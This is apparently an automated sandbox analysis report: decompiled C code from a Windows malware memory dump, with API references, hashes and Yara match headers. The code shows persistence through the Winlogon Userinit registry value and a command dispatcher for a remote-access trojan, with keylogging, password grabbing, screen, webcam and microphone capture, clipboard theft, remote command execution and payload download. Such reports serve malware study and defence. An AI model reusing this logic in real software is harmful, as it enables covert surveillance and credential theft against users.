                                          0x0040fdc3
                                          0x0040fdca
                                          0x0040fdd0
                                          0x0040fdd6
                                          0x0040fdd8
                                          0x0040fdde
                                          0x0040fde4
                                          0x0040fded
                                          0x0040fdf2
                                          0x0040fdf7
                                          0x0040fdfd
                                          0x0040fe04
                                          0x0040fe0a
                                          0x0040fe0a
                                          0x0040fe0b
                                          0x0040fe10
                                          0x0040fe15
                                          0x0040fe1a
                                          0x0040fe1f
                                          0x0040fe24
                                          0x0040fe3d
                                          0x0040fe43
                                          0x0040fe48
                                          0x0040fe4d
                                          0x0040fe5a
                                          0x0040fe5c
                                          0x0040fe62
                                          0x0040fe9e
                                          0x0040fe9e
                                          0x0040fea1
                                          0x00000000
                                          0x00000000
                                          0x0040fea3
                                          0x0040fea4
                                          0x0040fea4
                                          0x0040fe64
                                          0x0040fe64
                                          0x0040fe64
                                          0x0040fe65
                                          0x0040fe68
                                          0x0040fe6a
                                          0x0040fe75
                                          0x0040fe77
                                          0x0040fe77
                                          0x0040fe78
                                          0x0040fe78
                                          0x0040fe75
                                          0x0040fe7b
                                          0x0040fe7b
                                          0x0040fe7f
                                          0x00000000
                                          0x00000000
                                          0x0040fe85
                                          0x0040fe8c
                                          0x0040fe92
                                          0x0040fe96
                                          0x0040feab
                                          0x0040fe98
                                          0x0040fe98
                                          0x0040fe98
                                          0x0040feb7
                                          0x0040febc
                                          0x0040fec0
                                          0x0040fec6
                                          0x0040fecb
                                          0x0040fecd
                                          0x0040fed0
                                          0x0040fed1
                                          0x0040fed2
                                          0x0040fed9

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                          • String ID:
                                          • API String ID: 801014965-0
                                          • Opcode ID: b02d97d1e74cba480a13b512f3d40c3b2bbbec818edf6db353ae3fed4314c36b
                                          • Instruction ID: 8e1b74afc4b48038761e77c4c7ed844e3b6dc848ee47d0f1d3c708b4ab1b3d45
                                          • Opcode Fuzzy Hash: b02d97d1e74cba480a13b512f3d40c3b2bbbec818edf6db353ae3fed4314c36b
                                          • Instruction Fuzzy Hash: 474185B1840708DFC730DFA4D845ADA7BB8FB49710F20413BF551A76A1D7785885CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E00408FDA(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
                                          				char* _t13;
                                          				long _t15;
                                          				void* _t18;
                                          				int _t19;
                                          				void* _t25;
                                          
                                          				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed
                                          				if(_t13 != 0) {
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					return 0;
                                          				} else {
                                          					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					_t19 = 0;
                                          					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed
                                          					RegCloseKey(_a8);
                                          					if(_t15 == 0) {
                                          						_t19 = 1;
                                          					}
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					return _t19;
                                          				}
                                          			}








                                          0x00408fe7
                                          0x00408fef
                                          0x0040903c
                                          0x00409045
                                          0x00408ff1
                                          0x00408ff6
                                          0x00409000
                                          0x00409007
                                          0x00409013
                                          0x0040901e
                                          0x00409026
                                          0x00409028
                                          0x00409028
                                          0x0040902d
                                          0x00409038
                                          0x00409038

                                          APIs
                                          • RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                          • RegSetValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                          • RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040903C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                          • String ID:
                                          • API String ID: 2159132150-0
                                          • Opcode ID: c96356cb78dfb9d80db60ec6b5f7434fb2546494d656b3e51b260e3425f17090
                                          • Instruction ID: da37749cfa3f05033a32fbbd08786c797a634bef9566a04a8c5ae3221e21c764
                                          • Opcode Fuzzy Hash: c96356cb78dfb9d80db60ec6b5f7434fb2546494d656b3e51b260e3425f17090
                                          • Instruction Fuzzy Hash: DA016932000009AFCF009F90FD889EA3B69FF18355B008075F90A92060DB729D64CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 23%
                                          			E00408EF1(intOrPtr _a4, void* _a8, char* _a12, char _a15, char* _a16) {
                                          				int _v8;
                                          				char _v1032;
                                          				long _t16;
                                          
                                          				_v8 = 0x400;
                                          				_t16 = RegOpenKeyExA(_a8, _a12, 0, 0x20019,  &_a8); // executed
                                          				if(_t16 != 0) {
                                          					_push( &_a15);
                                          					_push(0x410668);
                                          				} else {
                                          					RegQueryValueExA(_a8, _a16, 0, 0,  &_v1032,  &_v8); // executed
                                          					RegCloseKey(_a8);
                                          					_push( &_a15);
                                          					_push( &_v1032);
                                          				}
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                          				return _a4;
                                          			}






                                          0x00408efd
                                          0x00408f12
                                          0x00408f1a
                                          0x00408f50
                                          0x00408f51
                                          0x00408f1c
                                          0x00408f31
                                          0x00408f3a
                                          0x00408f43
                                          0x00408f4a
                                          0x00408f4a
                                          0x00408f59
                                          0x00408f63

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                          • RegQueryValueExA.KERNELBASE(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                          • RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                          • String ID:
                                          • API String ID: 2462357041-0
                                          • Opcode ID: 6096438dd2eed9e4574e4a1dd84254fd0db2e199f98c401320f7f766a01d9ba8
                                          • Instruction ID: af5f393f80e90c15eb86e02cdebdcddb53bb09070e540c88b9aeee95ea817081
                                          • Opcode Fuzzy Hash: 6096438dd2eed9e4574e4a1dd84254fd0db2e199f98c401320f7f766a01d9ba8
                                          • Instruction Fuzzy Hash: CB01E4B510010EBFDB11DF50ED45FDA7B7DEB08704F508162BB19AA0A0D7B0AA59DB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00408E97(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
                                          				int _v8;
                                          				int _v12;
                                          				int _t14;
                                          				long _t16;
                                          				long _t20;
                                          
                                          				_t14 = 4;
                                          				_v8 = _t14;
                                          				_v12 = _t14;
                                          				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
                                          				if(_t16 != 0) {
                                          					return 0;
                                          				} else {
                                          					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8);
                                          					return RegCloseKey(_a8) & 0xffffff00 | _t20 == 0x00000000;
                                          				}
                                          			}








                                          0x00408e9e
                                          0x00408e9f
                                          0x00408ea2
                                          0x00408eb6
                                          0x00408ebe
                                          0x00408ef0
                                          0x00408ec0
                                          0x00408ed4
                                          0x00408eec
                                          0x00408eec

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,00407538,00000000,00020019,00407538,?,?,?,00407538,80000001,00000000,?,?,?,?,004108CC), ref: 00408EB6
                                          • RegQueryValueExA.ADVAPI32(00407538,?,00000000,80000001,?,00000000,00000000,?,?,?,00407538,80000001,00000000), ref: 00408ED4
                                          • RegCloseKey.ADVAPI32(00407538,?,?,?,00407538,80000001,00000000,?,?,?,?,004108CC,00000000), ref: 00408EDF
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 6dddc39d83993ea91a79dd0c836d699722d7f7815938bb7eeb73e5aee30751c6
                                          • Instruction ID: 3bc629e04baa43d7f680f8c54f18a859d153aa5dc69768ea16728ed6502bf047
                                          • Opcode Fuzzy Hash: 6dddc39d83993ea91a79dd0c836d699722d7f7815938bb7eeb73e5aee30751c6
                                          • Instruction Fuzzy Hash: DFF01D76900218BFDF118F90ED05FDA7FB8EB08760F108166FA05EA150E7B1DA50EB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: __dllonexit_onexit
                                          • String ID:
                                          • API String ID: 2384194067-0
                                          • Opcode ID: 1dd30157baa608dde4cf9a423aca3e4198879557ea686d33491940c2b8cd9277
                                          • Instruction ID: 0fb8bc4dfdfd85fd3f376317f87d27c867fe4673c273a50aaea641c95b1bfcf4
                                          • Opcode Fuzzy Hash: 1dd30157baa608dde4cf9a423aca3e4198879557ea686d33491940c2b8cd9277
                                          • Instruction Fuzzy Hash: 83C0C930404B04EACA106B14FE065C97712A694B36BA0863AB465204F1A7790598E58D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 19%
                                          			E0040A71E(void* __eflags, void* __fp0, long _a4, char _a7) {
                                          				char _v20;
                                          				char _v36;
                                          				void* _v47;
                                          				char _v48;
                                          				char _v52;
                                          				char _v53;
                                          				char _v72;
                                          				char _v80;
                                          				void* _v84;
                                          				char _v85;
                                          				char _v104;
                                          				char _v120;
                                          				char _v136;
                                          				char _v152;
                                          				char _v168;
                                          				void _v176;
                                          				char _v192;
                                          				char _v208;
                                          				char _v224;
                                          				void* _v240;
                                          				char _v256;
                                          				void* _v396;
                                          				void* _v400;
                                          				struct _WIN32_FIND_DATAA _v720;
                                          				char _v1756;
                                          				void* _t312;
                                          				void* _t317;
                                          				signed char _t319;
                                          				signed char _t347;
                                          				signed char _t351;
                                          				signed char _t355;
                                          				signed char _t357;
                                          				signed char _t363;
                                          				signed char _t365;
                                          				signed char _t367;
                                          				signed char _t373;
                                          				void* _t381;
                                          				signed char _t383;
                                          				signed char _t385;
                                          				signed char _t387;
                                          				signed char _t389;
                                          				signed char _t397;
                                          				signed char _t399;
                                          				int _t400;
                                          				char* _t405;
                                          				signed char _t408;
                                          				signed char _t410;
                                          				void* _t421;
                                          				void* _t423;
                                          				void* _t428;
                                          				void* _t429;
                                          				void* _t432;
                                          				int _t434;
                                          				void* _t439;
                                          				signed int _t443;
                                          				signed char _t456;
                                          				_Unknown_base(*)()* _t458;
                                          				signed char _t462;
                                          				char* _t465;
                                          				int _t466;
                                          				char* _t467;
                                          				int _t468;
                                          				char* _t469;
                                          				char* _t472;
                                          				char* _t475;
                                          				int _t476;
                                          				CHAR* _t478;
                                          				CHAR* _t479;
                                          				char* _t483;
                                          				char* _t484;
                                          				signed char _t485;
                                          				void* _t486;
                                          				void* _t487;
                                          				char* _t492;
                                          				char* _t493;
                                          				char* _t494;
                                          				signed char _t495;
                                          				CHAR* _t499;
                                          				char* _t509;
                                          				int _t510;
                                          				char* _t511;
                                          				int _t512;
                                          				char* _t513;
                                          				void* _t517;
                                          				char* _t520;
                                          				char* _t523;
                                          				char* _t526;
                                          				signed char _t527;
                                          				void* _t529;
                                          				void* _t531;
                                          				char* _t533;
                                          				char* _t541;
                                          				char* _t542;
                                          				char* _t543;
                                          				char* _t544;
                                          				char* _t545;
                                          				char _t557;
                                          				char* _t561;
                                          				char _t565;
                                          				struct _WIN32_FIND_DATAA* _t567;
                                          				struct _WIN32_FIND_DATAA* _t569;
                                          				char* _t583;
                                          				char* _t585;
                                          				char* _t590;
                                          				void* _t592;
                                          				char* _t596;
                                          				CHAR* _t599;
                                          				char* _t602;
                                          				char* _t607;
                                          				char* _t610;
                                          				char* _t613;
                                          				char* _t621;
                                          				char* _t622;
                                          				char* _t623;
                                          				void* _t625;
                                          				signed char _t627;
                                          				void* _t628;
                                          				char* _t629;
                                          				void* _t631;
                                          				void* _t633;
                                          				char* _t634;
                                          				void* _t636;
                                          				void* _t641;
                                          				char* _t650;
                                          				char* _t651;
                                          				char* _t652;
                                          				char* _t653;
                                          				char* _t654;
                                          				char* _t655;
                                          				char* _t656;
                                          				char* _t658;
                                          				int _t659;
                                          				void* _t663;
                                          				intOrPtr* _t666;
                                          				void* _t667;
                                          				void* _t677;
                                          				void* _t687;
                                          				unsigned int _t792;
                                          				signed int _t793;
                                          				signed char* _t879;
                                          				signed int _t898;
                                          				void* _t1020;
                                          				void* _t1044;
                                          				void* _t1047;
                                          				signed char _t1049;
                                          				void* _t1057;
                                          				void* _t1063;
                                          				long _t1071;
                                          				void* _t1073;
                                          				void* _t1075;
                                          				void* _t1076;
                                          				void* _t1088;
                                          				void* _t1091;
                                          				void* _t1113;
                                          				void* _t1119;
                                          				void* _t1120;
                                          				void* _t1129;
                                          				long _t1130;
                                          				long _t1134;
                                          				void* _t1148;
                                          
                                          				_t1148 = __eflags;
                                          				_t1071 = _a4;
                                          				_t1047 = _t1071 + 0x18;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t1047);
                                          				SetEvent( *(_t1071 + 0x28));
                                          				CloseHandle( *(_t1071 + 0x28));
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x415268);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t1047);
                                          				_push( &_v20);
                                          				E0040EFB5(_t1148);
                                          				_t1091 = _t1088 + 0x24;
                                          				_t312 = E004012B5( &_v20);
                                          				_t1149 = _t312;
                                          				if(_t312 <= 0) {
                                          					L166:
                                          					E00401B3C( &_v20);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					return 0;
                                          				}
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, _t1149, 0));
                                          				_t666 = __imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z;
                                          				_t317 =  *_t666( &_v36, "ping");
                                          				_t1150 = _t317;
                                          				_pop(_t677);
                                          				if(_t317 == 0) {
                                          					_t319 =  *_t666( &_v36, "keepaliveoff");
                                          					__eflags = _t319;
                                          					if(_t319 == 0) {
                                          						__eflags =  *_t666( &_v36, "filemgr");
                                          						if(__eflags == 0) {
                                          							__eflags =  *_t666( &_v36, "downloadfromurltofile");
                                          							if(__eflags == 0) {
                                          								__eflags =  *_t666( &_v36, "downloadfromlocaltofile");
                                          								if(__eflags == 0) {
                                          									__eflags =  *_t666( &_v36, "getproclist");
                                          									_pop(_t687);
                                          									if(__eflags == 0) {
                                          										__eflags =  *_t666( &_v36, "prockill");
                                          										if(__eflags == 0) {
                                          											__eflags =  *_t666( &_v36, "getwindows");
                                          											if(__eflags == 0) {
                                          												__eflags =  *_t666( &_v36, "closewindow");
                                          												if(__eflags == 0) {
                                          													__eflags =  *_t666( &_v36, "maxwindow");
                                          													if(__eflags == 0) {
                                          														__eflags =  *_t666( &_v36, "restorewindow");
                                          														if(__eflags == 0) {
                                          															__eflags =  *_t666( &_v36, "closeprocfromwindow");
                                          															if(__eflags == 0) {
                                          																__eflags =  *_t666( &_v36, "execcom");
                                          																if(__eflags == 0) {
                                          																	__eflags =  *_t666( &_v36, "consolecmd");
                                          																	if(__eflags == 0) {
                                          																		__eflags =  *_t666( &_v36, "openaddress");
                                          																		if(__eflags == 0) {
                                          																			_t347 =  *_t666( &_v36, "initializescrcap");
                                          																			__eflags = _t347;
                                          																			if(_t347 == 0) {
                                          																				__eflags =  *_t666( &_v36, "scrcap");
                                          																				if(__eflags == 0) {
                                          																					_t351 =  *_t666( &_v36, "freescrcap");
                                          																					__eflags = _t351;
                                          																					if(_t351 == 0) {
                                          																						__eflags =  *_t666( &_v36, "initklfrm");
                                          																						if(__eflags == 0) {
                                          																							_t355 =  *_t666( &_v36, "startonlinekl");
                                          																							__eflags = _t355;
                                          																							if(_t355 == 0) {
                                          																								_t357 =  *_t666( &_v36, "stoponlinekl");
                                          																								__eflags = _t357;
                                          																								if(_t357 == 0) {
                                          																									__eflags =  *_t666( &_v36, "getofflinelogs");
                                          																									if(__eflags == 0) {
                                          																										__eflags =  *_t666( &_v36, "autogetofflinelogs");
                                          																										if(__eflags == 0) {
                                          																											_t363 =  *_t666( &_v36, "deletekeylog");
                                          																											__eflags = _t363;
                                          																											if(_t363 == 0) {
                                          																												_t365 =  *_t666( &_v36, "clearlogins");
                                          																												__eflags = _t365;
                                          																												if(_t365 == 0) {
                                          																													_t367 =  *_t666( &_v36, "getscrslist");
                                          																													__eflags = _t367;
                                          																													if(_t367 == 0) {
                                          																														__eflags =  *_t666( &_v36, "dwnldscr");
                                          																														if(__eflags == 0) {
                                          																															__eflags =  *_t666( &_v36, "initcamcap");
                                          																															if(__eflags == 0) {
                                          																																_t373 =  *_t666( &_v36, "freecamcap");
                                          																																__eflags = _t373;
                                          																																if(_t373 == 0) {
                                          																																	__eflags =  *_t666( &_v36, "miccapture");
                                          																																	if(__eflags == 0) {
                                          																																		__eflags =  *_t666( &_v36, "stopmiccapture");
                                          																																		if(__eflags == 0) {
                                          																																			__eflags =  *_t666( &_v36, "pwgrab");
                                          																																			if(__eflags == 0) {
                                          																																				L98:
                                          																																				_t381 =  *_t666( &_v36, "deletefile");
                                          																																				_t1153 = _t381;
                                          																																				if(_t381 == 0) {
                                          																																					_t383 =  *_t666( &_v36, "close");
                                          																																					__eflags = _t383;
                                          																																					if(_t383 != 0) {
                                          																																						exit(0);
                                          																																					}
                                          																																					_t385 =  *_t666( &_v36, "uninstall");
                                          																																					__eflags = _t385;
                                          																																					if(_t385 == 0) {
                                          																																						_t387 =  *_t666( &_v36, "updatefromurl");
                                          																																						__eflags = _t387;
                                          																																						if(_t387 == 0) {
                                          																																							_t389 =  *_t666( &_v36, "updatefromlocal");
                                          																																							__eflags = _t389;
                                          																																							if(_t389 == 0) {
                                          																																								__eflags =  *_t666( &_v36, "msgbox");
                                          																																								if(__eflags == 0) {
                                          																																									__eflags =  *_t666( &_v36, "keyinput");
                                          																																									if(__eflags == 0) {
                                          																																										__eflags =  *_t666( &_v36, "mclick");
                                          																																										if(__eflags == 0) {
                                          																																											_t397 =  *_t666( &_v36, "OSpower");
                                          																																											__eflags = _t397;
                                          																																											if(_t397 == 0) {
                                          																																												_t399 =  *_t666( &_v36, "getclipboard");
                                          																																												__eflags = _t399;
                                          																																												if(_t399 != 0) {
                                          																																													L149:
                                          																																													_t400 = OpenClipboard(0);
                                          																																													__eflags = _t400;
                                          																																													if(_t400 == 0) {
                                          																																														goto L165;
                                          																																													}
                                          																																													_t1073 = GetClipboardData(1);
                                          																																													_t1049 = GlobalLock(_t1073);
                                          																																													GlobalUnlock(_t1073);
                                          																																													CloseClipboard();
                                          																																													__eflags = _t1049;
                                          																																													if(_t1049 == 0) {
                                          																																														_t1049 = 0x410668;
                                          																																													}
                                          																																													_t405 =  &_v72;
                                          																																													_push(_t1049);
                                          																																													_push(0x415268);
                                          																																													_push("clipboarddata");
                                          																																													_push(_t405);
                                          																																													L0040FC1A();
                                          																																													_push(_t405);
                                          																																													L0040FC20();
                                          																																													E00402198(0x415a30, _t1091 - 0x10);
                                          																																													L112:
                                          																																													__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																																													goto L165;
                                          																																												}
                                          																																												_t408 =  *_t666( &_v36, "setclipboard");
                                          																																												__eflags = _t408;
                                          																																												if(_t408 == 0) {
                                          																																													_t410 =  *_t666( &_v36, "emptyclipboard");
                                          																																													__eflags = _t410;
                                          																																													if(_t410 == 0) {
                                          																																														__eflags =  *_t666( &_v36, "dlldata");
                                          																																														if(__eflags == 0) {
                                          																																															__eflags =  *_t666( &_v36, "dllurl");
                                          																																															if(__eflags == 0) {
                                          																																																__eflags =  *_t666( &_v36, "initfun");
                                          																																																if(__eflags == 0) {
                                          																																																	__eflags =  *_t666( &_v36, "initremscript");
                                          																																																	if(__eflags == 0) {
                                          																																																		__eflags =  *_t666( &_v36, "initregedit");
                                          																																																		if(__eflags == 0) {
                                          																																																			goto L165;
                                          																																																		}
                                          																																																		_t421 = E00401289( &_v20, __eflags, 1);
                                          																																																		__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          																																																		E00409D91(__eflags, _t421);
                                          																																																		L164:
                                          																																																		goto L165;
                                          																																																	}
                                          																																																	_t423 = E00401289( &_v20, __eflags, 1);
                                          																																																	__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          																																																	E0040D18E(__eflags, _t423);
                                          																																																	goto L164;
                                          																																																}
                                          																																																E00406055(__eflags);
                                          																																																goto L165;
                                          																																															}
                                          																																															_v84 = _v84 & 0x00000000;
                                          																																															_a4 = _a4 & 0x00000000;
                                          																																															_t428 = E00401289( &_v20, __eflags, 1);
                                          																																															__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ( &_a4,  &_v84);
                                          																																															_push(_t428);
                                          																																															_t429 = E0040E750(_t428, __eflags);
                                          																																															__eflags = _t429 - 1;
                                          																																															if(_t429 != 1) {
                                          																																																goto L165;
                                          																																															}
                                          																																															E0040FC2C(E004052EC(_a4), _a4);
                                          																																															L123:
                                          																																															L124:
                                          																																															goto L165;
                                          																																														}
                                          																																														_t432 = E00401289( &_v20, __eflags, 1);
                                          																																														__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																														E004052EC(_t432);
                                          																																														goto L124;
                                          																																													}
                                          																																													_t434 = OpenClipboard(0);
                                          																																													__eflags = _t434;
                                          																																													if(_t434 == 0) {
                                          																																														goto L165;
                                          																																													}
                                          																																													EmptyClipboard();
                                          																																													L148:
                                          																																													CloseClipboard();
                                          																																													goto L149;
                                          																																												}
                                          																																												__eflags = OpenClipboard(0);
                                          																																												if(__eflags == 0) {
                                          																																													goto L165;
                                          																																												}
                                          																																												EmptyClipboard();
                                          																																												_t439 = E00401289( &_v20, __eflags, 1);
                                          																																												__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          																																												_t667 = GlobalAlloc(0x2000, _t439 + 1);
                                          																																												_a4 = GlobalLock(_t667);
                                          																																												_t443 = E00401289( &_v20, __eflags, 1);
                                          																																												__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																												asm("repne scasb");
                                          																																												_t792 =  !(_t443 | 0xffffffff);
                                          																																												_t1075 = _t443 - _t792;
                                          																																												_t793 = _t792 >> 2;
                                          																																												memcpy(_t1075 + _t793 + _t793, _t1075, memcpy(_a4, _t1075, _t793 << 2) & 0x00000003);
                                          																																												_t1091 = _t1091 + 0x18;
                                          																																												GlobalUnlock(_t667);
                                          																																												SetClipboardData(1, _t667);
                                          																																												goto L148;
                                          																																											}
                                          																																											E0040CA41();
                                          																																											_t1076 = 1;
                                          																																											__eflags =  *_t666(E00401289( &_v20, __eflags, _t1076), "0");
                                          																																											if(__eflags == 0) {
                                          																																												__eflags =  *_t666(E00401289( &_v20, __eflags, _t1076), "1");
                                          																																												if(__eflags == 0) {
                                          																																													_t456 =  *_t666(E00401289( &_v20, __eflags, _t1076), "2");
                                          																																													__eflags = _t456;
                                          																																													if(_t456 == 0) {
                                          																																														_t1057 = 0;
                                          																																														__eflags = 0;
                                          																																														L136:
                                          																																														_t458 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
                                          																																														_a4 = _t458;
                                          																																														__eflags =  *_t666(E00401289( &_v20, __eflags, _t1076), "3");
                                          																																														if(__eflags == 0) {
                                          																																															_t462 =  *_t666(E00401289( &_v20, __eflags, _t1076), "4");
                                          																																															__eflags = _t462;
                                          																																															if(_t462 == 0) {
                                          																																																goto L165;
                                          																																															}
                                          																																															_push(_t1057);
                                          																																															_push(_t1057);
                                          																																															_push(_t1076);
                                          																																															L138:
                                          																																															_a4();
                                          																																															goto L165;
                                          																																														}
                                          																																														_push(_t1057);
                                          																																														_push(_t1057);
                                          																																														_push(_t1057);
                                          																																														goto L138;
                                          																																													}
                                          																																													_t1057 = 0;
                                          																																													__eflags = 0;
                                          																																													_push(0);
                                          																																													_push(2);
                                          																																													L134:
                                          																																													ExitWindowsEx();
                                          																																													goto L136;
                                          																																												}
                                          																																												_t1057 = 0;
                                          																																												_push(0);
                                          																																												_push(_t1076);
                                          																																												goto L134;
                                          																																											}
                                          																																											_t1057 = 0;
                                          																																											_push(0);
                                          																																											_push(0);
                                          																																											goto L134;
                                          																																										}
                                          																																										_t465 = E00401289( &_v20, __eflags, 3);
                                          																																										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																										_t466 = atoi(_t465);
                                          																																										_t467 = E00401289( &_v20, __eflags, 2);
                                          																																										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																										_t468 = atoi(_t467);
                                          																																										_t469 = E00401289( &_v20, __eflags, 1);
                                          																																										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																										E0040E414(atoi(_t469), _t468, _t466);
                                          																																										goto L165;
                                          																																									}
                                          																																									_t472 = E00401289( &_v20, __eflags, 1);
                                          																																									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																									E0040E46D(atoi(_t472));
                                          																																									goto L123;
                                          																																								}
                                          																																								_t475 = E00401289( &_v20, __eflags, 3);
                                          																																								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																								_t476 = atoi(_t475);
                                          																																								_t478 = E00401289( &_v20, __eflags, 2);
                                          																																								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																								_t479 = E00401289( &_v20, __eflags, 1);
                                          																																								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																								MessageBoxA(0, _t479, _t478, _t476 + 0x10000);
                                          																																								goto L165;
                                          																																							} else {
                                          																																								goto L114;
                                          																																							}
                                          																																							while(1) {
                                          																																								L114:
                                          																																								__eflags =  *0x415a70;
                                          																																								if(__eflags == 0) {
                                          																																									break;
                                          																																								}
                                          																																								Sleep(0x64);
                                          																																							}
                                          																																							_t483 = getenv("AppData");
                                          																																							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t483,  &_a7, 0x4108cc, E00401289( &_v20, __eflags, 1));
                                          																																							_t484 =  &_v72;
                                          																																							L0040FC20();
                                          																																							_t485 =  &_v52;
                                          																																							L0040FC14();
                                          																																							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t485, _t484, _t484, _t483);
